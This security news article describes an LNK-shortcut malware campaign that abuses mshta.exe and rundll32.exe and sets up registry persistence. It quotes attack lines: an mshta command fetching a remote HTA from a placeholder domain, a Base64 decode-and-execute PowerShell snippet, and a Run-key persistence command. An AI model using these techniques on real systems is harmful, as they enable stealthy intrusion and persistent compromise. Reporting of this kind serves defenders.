A recent surge in cyber threats has brought the spotlight onto a new form of malware that exploits Windows shortcut files, commonly known as .LNK files. This wave of attacks, which emerged in late August 2025, has raised alarms among security teams, as the malware cleverly leverages trusted Microsoft binaries to circumvent endpoint protections and execute malicious payloads without drawing attention.
Primarily disseminated through spear-phishing emails and compromised websites, these shortcut files may appear harmless at first glance. However, they contain embedded commands that invoke legitimate Windows utilities, enabling the retrieval and execution of additional malware components.
Initial reports from victims indicate subtle signs of compromise, including unusual PowerShell calls and unexpected network connections, which are often overlooked as benign system activity. The campaign targets both enterprise and consumer endpoints, with a particular focus on users possessing elevated privileges.
The initial lure of these attacks comes in the form of emails that mimic internal IT notifications or security alerts, prompting recipients to click on what seems to be an innocuous shortcut attachment.
Upon execution, the .LNK file activates Windows Explorer, which loads a hidden payload. This process effectively weaponizes built-in binaries such as mshta.exe and rundll32.exe, facilitating the attack while evading antivirus signatures and behavioral detection rules that typically flag the direct execution of unknown executables.
K7 Security Labs analysts have observed that the attackers meticulously crafted the LNK payload to utilize encoded parameters passed to these native utilities, complicating straightforward analysis by sandbox environments. By chaining multiple benign processes, the malware achieves “living off the land” execution, thereby minimizing its forensic footprint both on disk and in memory.
Victims’ endpoint logs reveal rapid process spawning events, where each process hands off execution to the next stage in less than a second, further complicating detection efforts.
Infection Mechanism and Payload Deployment
Examining the infection mechanism more closely, the malicious .LNK file embeds an OLE object that points to a remote HTML application (HTA) script hosted on a compromised server. When a user double-clicks the shortcut, Explorer invokes mshta.exe with the following command line:
mshta.exe "http[:]//malicious-domain.com/loader.hta"The obfuscated loader script employs Base64-encoded PowerShell commands to download the next-stage payload:
$payload = 'aGVsbG8gd29ybGQ='
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))This snippet decodes and executes a simple script from memory, showcasing the attacker’s strategy to minimize disk writes. Once the HTA executes, it utilizes rundll32.exe to load a malicious DLL directly into a suspended svchost.exe process, successfully bypassing executable file scanning.
The DLL is tasked with establishing persistence by creating a Win32 registry run key:
HKCU:SoftwareMicrosoftWindowsCurrentVersionRun -Name "Updater" -Value "rundll32.exe C:WindowsTempupdater.dll,EntryPoint"By exploiting registry-based persistence and trusted Windows binaries, the malware ensures that it launches automatically upon user login, even if endpoint detections attempt to quarantine the DLL file.
Indicators of compromise include network requests to suspicious domains, anomalous mshta.exe and rundll32.exe process trees, and unrecognized registry entries under the CurrentVersionRun key.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
